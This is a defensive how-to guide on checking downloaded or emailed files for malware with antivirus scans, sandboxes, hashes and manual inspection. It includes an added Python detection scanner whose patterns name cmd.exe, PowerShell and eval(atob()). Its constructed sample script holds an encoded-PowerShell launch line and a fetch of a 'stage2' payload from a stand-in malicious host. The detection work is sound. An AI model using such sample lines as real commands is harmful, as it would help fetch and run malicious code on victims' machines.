How to Check a File for Malware Safely | Guide for Opening Files from Mails or Downloads

Introduction

Receiving files from new partners, suppliers, or unknown senders is a common part of modern business. However, malware hidden in seemingly harmless files (e.g., PDFs, Word documents, or executables) can compromise your data, systems, and even your entire network. In 2025, cyberattacks via malicious file attachments increased by 35% (Source: SonicWall Cyber Threat Report 2025).

This guide will walk you through how to safely check a file for malware, using free and paid tools, best practices, and expert recommendations. Whether you're a business owner, IT professional, or everyday user, these steps will help you avoid falling victim to cyber threats.

Why You Should Never Trust Files from Unknown Sources

Malware can be disguised in any file type, including:

  • PDFs and Office documents (e.g., .docx, .xlsx)

  • Executables (e.g., .exe, .msi)

  • Archives (e.g., .zip, .rar)

  • Scripts (e.g., .js, .py, .vbs)

Common malware types delivered via files include:

  • Ransomware: Encrypts your files and demands payment (e.g., LockBit, BlackCat).

  • Spyware: Steals sensitive data (e.g., keyloggers, trojans).

  • Adware: Displays unwanted ads and slows down your system.

  • Worms: Self-replicating malware that spreads across networks.

💡 Did You Know?
According to Cisco’s 2025 Annual Cybersecurity Report, 90% of malware is delivered via email attachments or downloads.

Step-by-Step Guide: How to Check a File for Malware

Step 1: Isolate the File

Before doing anything else, do not open the file on your main computer. Instead:

  • Move it to a quarantined folder (e.g., a dedicated "Suspicious Files" directory).

  • Use a separate, non-critical device or a virtual machine (VM) for analysis.

  • Disconnect from the internet to prevent malware from phoning home.

⚠️ Warning:
Opening a malicious file—even in "Preview" mode—can trigger an infection.

Step 2: Scan with Antivirus/Anti-Malware Tools

Option A: VirusTotal (Free & Online)

VirusTotal is a free service that scans files with 70+ antivirus engines (e.g., Kaspersky, Bitdefender, ESET).

How to use VirusTotal:

  1. Go to VirusTotal.

  2. Upload the file (max size: 650 MB).

  3. Wait for the scan to complete (usually 1-2 minutes).

  4. Review the detection ratio (e.g., "20/70 engines detected malware").

    • **0 detections**: Likely safe (but proceed with caution).

    • **1+ detections**: **Do not open the file**.

🔍 Pro Tip:
VirusTotal also provides file behavior analysis (e.g., network connections, registry changes). Check the "Details" tab for more insights.

Option B: Local Antivirus Scan

Use trusted antivirus software to scan the file offline:

How to scan:

  1. Right-click the file.

  2. Select "Scan with [Your Antivirus]".

  3. If the scan flags the file as malicious, delete it immediately.

Step 3: Use Sandbox Analysis

Sandboxing allows you to safely execute a file in a controlled environment and observe its behavior. Here are the best tools:

| Tool | Description | Link | Free/Paid |
|---|---|---|---|
| Any.run | Interactive sandbox for analyzing malware in real time. | any.run | Free (public submissions) |
| Hybrid Analysis | Automated malware analysis with detailed reports. | hybrid-analysis.com | Free |
| Cuckoo Sandbox | Open-source sandbox for advanced users. | cuckoosandbox.org | Free |
| Joe Sandbox | Commercial sandbox with deep analysis. | joesandbox.com | Paid |

How to use a sandbox:

  1. Upload the file to the sandbox tool.

  2. Wait for the analysis to complete (usually 5-10 minutes).

  3. Review the report for suspicious activities, such as:

    • Unexpected network connections.

    • File modifications or deletions.

    • Registry changes.

    • Process injections.

💡 Example:
If a Word document tries to download and execute a PowerShell script, it’s almost certainly malicious.

Step 4: Check File Metadata and Hashes

A. Verify File Extensions

Malware often disguises itself with fake file extensions. For example:

  • invoice.pdf.exe (appears as invoice.pdf if extensions are hidden).

  • contract.docx.js (appears as contract.docx).

How to check:

  • Windows: Enable file extensions in File Explorer > View > Show > File name extensions.

  • Mac/Linux: Use the file command in Terminal:

    file suspicious_file.docx

B. Calculate and Check File Hashes

A file hash (e.g., SHA-256) is a unique fingerprint of a file. You can use it to check if the file matches known malware.

How to calculate a hash:

  • Windows (PowerShell):

    Get-FileHash -Algorithm SHA256 suspicious_file.exe

  • Mac/Linux (Terminal):

    sha256sum suspicious_file.exe

Where to check the hash:

⚠️ Warning:
If the hash matches a known malware sample, do not open the file.

Step 5: Manual Inspection (For Advanced Users)

If you’re comfortable with technical details, you can manually inspect certain file types:

A. Text/Script Files (e.g., .js, .py, .vbs)

  1. Open the file in a text editor (e.g., Notepad++, VS Code).

  2. Look for:

    • **Obfuscated code** (e.g., long strings of random characters).

    • **Base64-encoded payloads** (e.g., `eval(atob("..."))`).

    • **Suspicious URLs or IP addresses** (e.g., `http://malicious-site.xyz`).

    • **Calls to dangerous executables** (e.g., `cmd.exe`, `powershell.exe`, `wscript.exe`).
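An added example, not part of the original guide, that turns the checklist above into a small scanner: it reports each indicator with its line number and match, and treats a very long opaque token as a crude obfuscation signal. The regular expressions, the labels and the "high risk" set are assumptions of this example, and the sample script is constructed and inert.

```python
import re

# Indicators from the checklist, as (label, pattern) pairs. Labels and patterns
# are this example's assumptions and are deliberately broad: a hit is a reason
# to look closer, not proof of malice.
INDICATORS = [
    ("base64 decode fed to eval", re.compile(r"eval\s*\(\s*atob\s*\(", re.I)),
    ("long base64-looking string", re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
    ("URL", re.compile(r"https?://[^\s'\"<>]+", re.I)),
    ("bare IP address", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("call to shell/script host", re.compile(r"\b(?:cmd|powershell|wscript|cscript|mshta)\.exe\b", re.I)),
    ("dynamic code execution", re.compile(r"\b(?:eval|exec|execScript|Function)\s*\(")),
]
HIGH_RISK = {"base64 decode fed to eval", "call to shell/script host"}


def scan_script(text: str) -> list:
    """Return one record per indicator hit: line number, label and matched text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in INDICATORS:
            for m in pattern.finditer(line):
                hits.append({"line": lineno, "indicator": label, "match": m.group(0)[:60]})
    return hits


def longest_run(text: str) -> int:
    """Longest whitespace-free token; obfuscated scripts tend to have very long ones."""
    return max((len(tok) for tok in text.split()), default=0)


def is_suspicious(text: str) -> bool:
    """Treat as suspicious on any high-risk hit or on a very long opaque token."""
    labels = {h["indicator"] for h in scan_script(text)}
    return bool(labels & HIGH_RISK) or longest_run(text) > 200


# Constructed sample (inert: the "payload" is just repeated base64 characters).
SAMPLE = (
    "// constructed sample, not real malware\n"
    "var a = 1;\n"
    'var payload = "' + "QUJD" * 24 + '";\n'
    "eval(atob(payload));\n"
    'run("cmd.exe /c powershell.exe -enc " + payload);\n'
    'fetch("http://malicious-site.xyz/stage2");\n'
)

if __name__ == "__main__":
    for hit in scan_script(SAMPLE):
        print(f'line {hit["line"]}: {hit["indicator"]} -> {hit["match"]}')
    print("suspicious:", is_suspicious(SAMPLE))
```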

B. PDF/Office Files

  • Use pdfid (for PDFs) or OleTools (for Office files) to check for:

    • Embedded macros (common in Word/Excel malware).

    • Exploits (e.g., CVE-2023-21608 in Adobe Acrobat).

🔧 Tools:

Step 6: Behavioral Analysis (Monitor File Activity)

If you must open the file, use these tools to monitor its behavior:

| Tool | Purpose | Link |
|---|---|---|
| Process Monitor | Monitors file, registry, and process activity in real time. | Microsoft Sysinternals |
| Wireshark | Captures and analyzes network traffic. | wireshark.org |
| TCPView | Shows all active TCP and UDP connections. | Microsoft Sysinternals |

What to look for:

  • Unexpected outbound network connections (e.g., to unknown IPs).

  • File deletions or modifications (e.g., in C:\Windows\System32).

  • New processes spawned by the file.

Step 7: Consult a Professional

If the file is highly sensitive or you’re unsure about the results:

General Precautions to Avoid Malware

  1. Never disable security features (e.g., macros in Office files) to open a file.

  2. Avoid opening files from unknown senders unless absolutely necessary.

  3. Use a dedicated, air-gapped machine for testing suspicious files.

  4. Keep your software updated (e.g., OS, antivirus, browsers).

  5. Educate your team on recognizing phishing emails and malicious attachments.

  6. Back up your data regularly so you can recover from ransomware attacks.

What to Do If You Find Malware

  1. Do not open the file under any circumstances.

  2. Delete the file from all devices.

  3. Inform the sender (they may be unaware their system is compromised).

  4. Scan your entire system with antivirus software.

  5. Monitor for unusual activity (e.g., unauthorized logins, data exfiltration).

  6. Report the incident to your IT team or a cybersecurity professional.

Best Free and Paid Tools for Malware Analysis

| Tool | Type | Free/Paid | Link |
|---|---|---|---|
| VirusTotal | Multi-engine antivirus scan | Free | virustotal.com |
| Any.run | Interactive sandbox | Free (public) | any.run |
| Hybrid Analysis | Automated malware analysis | Free | hybrid-analysis.com |
| Cuckoo Sandbox | Open-source sandbox | Free | cuckoosandbox.org |
| Malwarebytes | Local antivirus scan | Free/Paid | malwarebytes.com |
| Process Monitor | Behavioral analysis | Free | Microsoft Sysinternals |
| Wireshark | Network traffic analysis | Free | wireshark.org |
| Joe Sandbox | Commercial sandbox | Paid | joesandbox.com |

FAQs About Checking Files for Malware

1. Can a PDF or Word document contain malware?

Yes. Malicious PDFs and Office files can contain exploits (e.g., CVE-2023-21608) or embedded macros that execute malware when opened.

2. Is VirusTotal 100% accurate?

No. While VirusTotal uses 70+ antivirus engines, some zero-day malware (new, unknown threats) may not be detected. Always use multiple tools for verification.

3. What should I do if my antivirus doesn’t detect anything, but I’m still suspicious?

Use a sandbox tool (e.g., Any.run) to observe the file’s behavior. If it exhibits suspicious activity (e.g., network connections), treat it as malicious.

4. Can I trust files from known senders?

Not always. Compromised email accounts or supply chain attacks (e.g., SolarWinds) can make even trusted senders unknowingly spread malware. Always verify.

5. How often should I scan my system for malware?

  • Weekly for personal use.

  • Daily for business/critical systems.

  • After every suspicious file download.

Conclusion

Checking a file for malware is a critical step in protecting your data, devices, and business from cyber threats. By following this step-by-step guide, you can safely verify files before opening them, using a combination of antivirus scans, sandbox analysis, and manual inspection.

Remember:

  • Isolate the file before analysis.

  • Use multiple tools (e.g., VirusTotal + sandbox).

  • Never open suspicious files on your main system.

  • Stay updated on the latest cybersecurity threats.

By taking these precautions, you can minimize the risk of malware infections and keep your digital environment secure.
